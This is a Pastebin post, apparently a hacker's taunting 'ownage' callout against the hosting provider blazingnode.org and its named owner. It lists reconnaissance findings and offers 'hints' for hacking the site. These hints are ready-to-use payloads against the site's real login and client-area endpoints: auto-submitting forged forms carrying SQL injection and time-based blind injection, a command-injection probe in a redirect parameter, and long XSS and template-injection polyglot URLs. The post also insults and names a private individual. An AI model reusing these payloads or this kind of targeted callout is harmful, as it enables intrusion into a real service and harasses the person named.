Advertisement
Guest User

Scott ownage #1

a guest
Nov 11th, 2018
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.51 KB | None | 0 0
  1. This won't disclose biggest vulnerabilities of the website considering i don't want to expose deepest gaping holes.
  2. I want to to expose him for not being an hacker.
  3.  
  4.  
  5. https://soundcloud.com/thothey/dr-raid-nice-report
  6. dedicated to BlazingNode Owner Scott Wiwek.
  7. You shouldn't have mess with my boy Chrono - the Infamous ILlKiD Atmos The Wicked
  8. Got to be to the day that i Die #DG4E
  9. If you do argue after i will be fuzzing your shit, then abuse of burp, REST,recon,fuzzer http view list goes on , bitch we toolin' up and write our own sadkunt shout out to PP4L, Digital Gangster and thugCrowd.
  10.  
  11.  
  12.  
  13.  
  14. Web Server Disclosure
  15. banner
  16. server: Apache
  17. host
  18. blazingnode.org
  19. banner
  20. x-powered-by: PHP/7.0.32
  21. host
  22. blazingnode.org
  23.  
  24. Did you really think hidden your poor code and premade template behind cloudflare would stop any real hackers.
  25. It's just a matter of time before someone find a bypass. Ahhh poor little boy, Security is an illusion in this Inet
  26. Gotta be on point with that bitness fitness.
  27.  
  28.  
  29. X-Frame Option not used
  30. Can't setup poper header that suck.Ahhh didn't learn how to properly setup a web server...
  31. http://en.wikipedia.org/wiki/X-FRAME-OPTIONS#Frame-Options
  32. http://en.wikipedia.org/wiki/Clickjacking
  33. This is just the more known vulnerabilities that can happen digg a bit and you will find much more.
  34. about X-frame
  35. uri
  36. https://blazingnode.org/
  37. email
  38. sales@blazingnode.org
  39.  
  40. GET https://blazingnode.org/ HTTP/1.1
  41. Damn this fool not even on http2. As a provider you should be up to date with latest technology.
  42.  
  43.  
  44. Admin page discovery
  45. uri
  46. https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
  47. What the actual fuck, why this is not behind any kind of waf, ssl gateway, etc.
  48. Such page should always be behind additional security layers and only allow connection from specific VPN ip's you setted up for the compagny in question.
  49.  
  50. Path disclosures
  51. He didn't even learn about gttp status code and how it can reveal server path informations...
  52. Ahhh those pseudo hackers that pretend that they know something...
  53. I bet he don't even know OSI layer.
  54.  
  55. AutoComplete Enabled
  56. uri
  57. https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
  58.  
  59. <form method="post" action="/admin/dologin.php">
  60. <form method="post" class="using-password-strength" action="/register.php" role="form" name="orderfrm" id="frmCheckout">
  61. <form role="form" method="post" action="/index.php?rp=/knowledgebase/search">
  62. <form method="post" action="contact.php" class="form-horizontal" role="form">
  63. <form method="post" action="https://blazingnode.org/pwreset.php" role="form">
  64. uri
  65. https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2F
  66.  
  67. <form accept-charset="UTF-8" action="" method="post" name="loginform" class="form-horizontal">
  68.  
  69. uri
  70. https://blazingnode.org/admin/login.php?action=reset
  71.  
  72. <form action="/admin/login.php" method="post" id="frmResetPassword">
  73.  
  74.  
  75. Well , i would like to thanks you for allowing us to easily grab credential.
  76. It make the job much easier this way.
  77.  
  78. The game is either to be sold or taught. So i won't post the best vulnerabilities or path.
  79. But i'm nice enough to give a List of little hints to proceed sucessfull hacking of blazingnode
  80.  
  81. <img src="https://blazingnode.org/admin/login.php?redirect=http%3A%2F%2F9peQR"/>
  82.  
  83. <img src="https://blazingnode.org/admin/login.php?redirect=%22%7Cecho%20%27w%27%273%27%27A%27%27n%27%273%27%20%7C%22"/>
  84.  
  85. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  86. <input type="hidden" name="username" value="zliy8"/>
  87. <input type="hidden" name="password" value="H2EwgGRxZB"/>
  88. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  89. <input type="hidden" name="language" value=""/>
  90. <input type="hidden" name="redirect" value="/admin/"/>
  91. <input type="hidden" name="rememberme" value="1"/>
  92. </form>
  93. <script>document.forms[0].submit()</script>
  94.  
  95. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  96. <input type="hidden" name="username" value="kAIn2"/>
  97. <input type="hidden" name="password" value="4qKYZGRxZB"/>
  98. <input type="hidden" name="token" value="56dac0ee78af252b371e64febd457a51b2386128"/>
  99. <input type="hidden" name="language" value=""/>
  100. <input type="hidden" name="redirect" value="&amp;#039;&amp;gt;&amp;lt;sftPM&amp;gt;"/>
  101. <input type="hidden" name="rememberme" value="1"/>
  102. </form>
  103. <script>document.forms[0].submit()</script>
  104. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  105. <input type="hidden" name="username" value="KyVph"/>
  106. <input type="hidden" name="password" value="sVp4RGRxZB"/>
  107. <input type="hidden" name="token" value="66c71005b612923975c3df9d3ffea58ebd0d7392"/>
  108. <input type="hidden" name="language" value=""/>
  109. <input type="hidden" name="redirect" value="&amp;quot;&amp;gt;&amp;lt;sftPM&amp;gt;"/>
  110. <input type="hidden" name="rememberme" value="1"/>
  111. </form>
  112. <script>document.forms[0].submit()</script>
  113. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  114. <input type="hidden" name="username" value="&quot;>&lt;vSrUv>"/>
  115. <input type="hidden" name="password" value="H2EwgGRxZB"/>
  116. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  117. <input type="hidden" name="language" value=""/>
  118. <input type="hidden" name="redirect" value="/admin/"/>
  119. <input type="hidden" name="rememberme" value="1"/>
  120. </form>
  121. <script>document.forms[0].submit()</script>
  122. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  123. <input type="hidden" name="username" value="zliy8"/>
  124. <input type="hidden" name="password" value="SELECT CONCAT(0x66,0x47,0x6b,0x4f,0x4e)#"/>
  125. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  126. <input type="hidden" name="language" value=""/>
  127. <input type="hidden" name="redirect" value="/admin/"/>
  128. <input type="hidden" name="rememberme" value="1"/>
  129. </form>
  130. <script>document.forms[0].submit()</script>
  131. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  132. <input type="hidden" name="username" value="zliy8"/>
  133. <input type="hidden" name="password" value="H2EwgGRxZB"/>
  134. <input type="hidden" name="token" value="&apos; UNION ALL SELECT CONCAT(0x66,0x47,0x6b,0x4f,0x4e),NULL#"/>
  135. <input type="hidden" name="language" value=""/>
  136. <input type="hidden" name="redirect" value="/admin/"/>
  137. <input type="hidden" name="rememberme" value="1"/>
  138. </form>
  139. <script>document.forms[0].submit()</script>
  140.  
  141. <form method="POST" action="https://blazingnode.org/admin/dologin.php">
  142. <input type="hidden" name="username" value="zliy8"/>
  143. <input type="hidden" name="password" value="-1 OR 1=(SELECT 1 FROM (SELECT SLEEP(25))A)"/>
  144. <input type="hidden" name="token" value="6dba90d19c54f28e48ac0bcbc035889ce1a68660"/>
  145. <input type="hidden" name="language" value=""/>
  146. <input type="hidden" name="redirect" value="/admin/"/>
  147. <input type="hidden" name="rememberme" value="1"/>
  148. </form>
  149. <script>document.forms[0].submit()</script>
  150. <?php
  151.  
  152. require_once 'HTTP/Request2.php';
  153.  
  154. $request = new HTTP_Request2("https://blazingnode.org/templates/blazingnode/js/scripts.min.js?v=5d11cc");
  155.  
  156. $request->setAdapter('curl');
  157.  
  158. $request->setMethod("GET");
  159.  
  160. try {
  161. $response = $request->send();
  162. } catch (HTTP_Request2_Exception $e) {
  163. echo 'Error: ' . $e->getMessage();
  164. }
  165.  
  166. if ($response->getStatus() == 200) {
  167. echo $response->getBody();
  168. } else {
  169. echo 'Unexpected HTTP status: ' . $response->getStatus() . ' ' . $response->getReasonPhrase();
  170. }
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177. https://blazingnode.org/clientarea.php?token=1)%3B%20WAITFOR%20DELAY%20%2719%3A00%3A25%27--&token=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&token=%7B%7B7*7%7D%7D&username=%27&username=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&username=%7B%7B7*7%7D%7D&password=%27&password=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))
  178. %2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&password=%7B%7B77%7D%7D&rememberme='&rememberme='%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F'%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&rememberme=%7B%7B77%7D%7D
  179. GET https://blazingnode.org/clientarea.php?token=1)%3B%20WAITFOR%20DELAY%20%2719%3A00%3A25%27--&token=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&token=%7B%7B7*7%7D%7D&username=%27&username=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3B%0D%0Aalert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%0D%0A%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2FSCRIPT%3E&username=%7B%7B7*7%7D%7D&password=%27&password=%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%27%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%
  180. rated high on owasp
  181. https://blazingnode.org/admin/login.php?redirect=%2Fadmin%2F
  182. whcms
  183. POST https://blazingnode.org/admin/dologin.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 309 username=vbYOc&password=OrKf4qHfa7&token=54e5a9a4f806fdf9175410f35b52a383a880cff6&language=&redirect=%26lt%3Babc%20xmlns%3Axyz%3D%26%23039%3Bhttp%3A%2F%2Fwww.w3.org%2F1999%2Fxhtml%26%23039%3B%26gt%3B%26lt%3Bxyz%3Abody%20onload%3D%26%23039%3Btry(bBuVa)%26%23039%3B%2F%26gt%3B%26lt%3B%2Fabc%26gt%3B&rememberme=1
  184. https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2Findex.php%3F1234%2520%2527%2520AND%25201%3D0%2520UNION%2520ALL%2520SELECT%2520%2527admin%2527%2C%2520%252781dc9bdb52d04dc20036dbd8313ed055
  185. https://blazingnode.org/clientarea.php?token=%27&username=%27&password=%27&rememberme=%27&token=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&username=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&password=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&rememberme=%27;alert(String.fromCharCode(88,83,83))//%27;alert(String.fromCharCode(88,83,83))//%22;%0D%0Aalert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//--%0D%0A%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
  186. https://cp.blazingnode.org:4085/index.php?act=login&redirect=%2F&username=%27&password=%27&login=%27&username=jaVasCript:/*-/*%60/*/%60/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E&password=jaVasCript:/*-/*%60/*/%60/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E&login=jaVasCript:/*-/*%60/*/%60/*%27/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%3CsVg/%3CsVg/oNloAd=alert()//%3E%3E&username=%7B%7B7*7%7D%7D&password=%7B%7B7*7%7D%7D&login=%7B%7B7*7%7D%7D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement